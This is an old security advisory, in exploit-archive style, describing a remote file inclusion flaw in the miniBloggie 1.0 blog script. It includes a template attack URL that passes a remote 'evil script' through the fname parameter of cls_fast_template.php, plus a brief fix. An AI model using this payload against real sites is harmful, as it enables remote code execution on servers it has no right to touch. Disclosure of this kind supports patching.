|
---------------------------------------------------------------------------------------=0D
miniBloggie 1.0 fname Remote File Inclusion=0D
---------------------------------------------------------------------------------------=0D
Author : Sh3ll=0D
Date : 2006/05/01=0D
HomePage : http://www.sh3ll.ir=0D
Contact : sh3ll[at]sh3ll[dot]ir=0D
---------------------------------------------------------------------------------------=0D
Affected Software Description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
Application : miniBloggie =0D
version : 1.0=0D
Venedor : http://www.mywebland.com=0D
Class : Remote File Inclusion=0D
Risk : High=0D
Summary : minibloggie, a mini blog script yet effective built using fast template =0D
for easy customisation. Using Mysql database system with edit, delete, , support smiley =0D
& BBcode, adminstrator log in for easy website management.=0D
=0D
---------------------------------------------------------------------------------------=0D
Vulnerability:=0D
~~~~~~~~~~~~~=0D
The Problem Exists Is in The cls_fast_template.php When Used The Variable in a $fname=0D
include() Function Without Being Declared.=0D
---------------------------------cls_fast_template.php---------------------------------=0D
....=0D
http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script]=0D
=0D
Solution:=0D
~~~~~~~~=0D
Sanitize Variabel $fname in cls_fast_template.php=0D
----------------------------------------------------------------------------------------=0D
Note:=0D
~~~~=0D
Venedor Contacted, But No Response. So Do a Dirty Patch.=0D
----------------------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~=0D
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena=0D
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams